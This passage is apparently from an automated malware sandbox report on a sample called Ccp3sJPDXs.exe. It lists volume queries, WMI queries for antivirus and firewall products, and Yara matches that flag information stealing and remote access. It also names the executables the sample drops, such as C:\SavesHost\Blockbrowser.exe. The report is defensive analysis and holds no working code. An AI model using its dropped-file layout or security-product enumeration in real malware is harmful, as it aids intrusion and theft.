                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeQueries volume information: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe VolumeInformation
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeCode function: 0_2_007EDF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_007EDF1E
                                    Source: C:\Users\user\Desktop\Ccp3sJPDXs.exeCode function: 0_2_007DB146 GetVersionExW,0_2_007DB146
                                    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                    Source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                                    Stealing of Sensitive Information

                                    barindex
                                    Source: Yara matchFile source: 00000019.00000002.3493949668.00000000034F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000019.00000002.3493949668.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000019.00000002.3493949668.000000000319A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000019.00000002.3493949668.0000000003346000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000005.00000002.2337229125.0000000012991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: Blockbrowser.exe PID: 4368, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: 8Kh5jgTdnc69SVsXvfN.exe PID: 7940, type: MEMORYSTR
                                    Source: Yara matchFile source: Ccp3sJPDXs.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.Ccp3sJPDXs.exe.67fb4ca.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.Ccp3sJPDXs.exe.70024ca.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.Ccp3sJPDXs.exe.70024ca.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.Ccp3sJPDXs.exe.67fb4ca.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 5.0.Blockbrowser.exe.370000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000005.00000000.2248447205.0000000000372000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.2196011939.0000000006FAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.2195365326.00000000067A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\Program Files (x86)\Windows Media Player\C1lzS0DukHxxFP1s.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\SavesHost\Blockbrowser.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\ZI0Zcb1pDT.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\SavesHost\SgrmBroker.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\Public\Documents\0ZuAkTjxKX.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe, type: DROPPED
                                    Source: Yara matchFile source: Ccp3sJPDXs.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.Ccp3sJPDXs.exe.67fb4ca.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.Ccp3sJPDXs.exe.70024ca.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.Ccp3sJPDXs.exe.70024ca.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.Ccp3sJPDXs.exe.67fb4ca.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 5.0.Blockbrowser.exe.370000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\Program Files (x86)\Windows Media Player\C1lzS0DukHxxFP1s.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\SavesHost\Blockbrowser.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\ZI0Zcb1pDT.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\SavesHost\SgrmBroker.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\Public\Documents\0ZuAkTjxKX.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe, type: DROPPED

                                    Remote Access Functionality

                                    barindex
                                    Source: Yara matchFile source: 00000019.00000002.3493949668.00000000034F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000019.00000002.3493949668.0000000002E9A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000019.00000002.3493949668.000000000319A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000019.00000002.3493949668.0000000003346000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000005.00000002.2337229125.0000000012991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: Blockbrowser.exe PID: 4368, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: 8Kh5jgTdnc69SVsXvfN.exe PID: 7940, type: MEMORYSTR
                                    Source: Yara matchFile source: Ccp3sJPDXs.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.Ccp3sJPDXs.exe.67fb4ca.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.Ccp3sJPDXs.exe.70024ca.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.Ccp3sJPDXs.exe.70024ca.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.Ccp3sJPDXs.exe.67fb4ca.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 5.0.Blockbrowser.exe.370000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000005.00000000.2248447205.0000000000372000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.2196011939.0000000006FAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.2195365326.00000000067A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\Program Files (x86)\Windows Media Player\C1lzS0DukHxxFP1s.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\SavesHost\Blockbrowser.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\ZI0Zcb1pDT.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\SavesHost\SgrmBroker.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\Public\Documents\0ZuAkTjxKX.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\SavesHost\8Kh5jgTdnc69SVsXvfN.exe, type: DROPPED
                                    Source: Yara matchFile source: Ccp3sJPDXs.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.Ccp3sJPDXs.exe.67fb4ca.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.Ccp3sJPDXs.exe.70024ca.1.raw.unpack, type: UNPACKEDPE
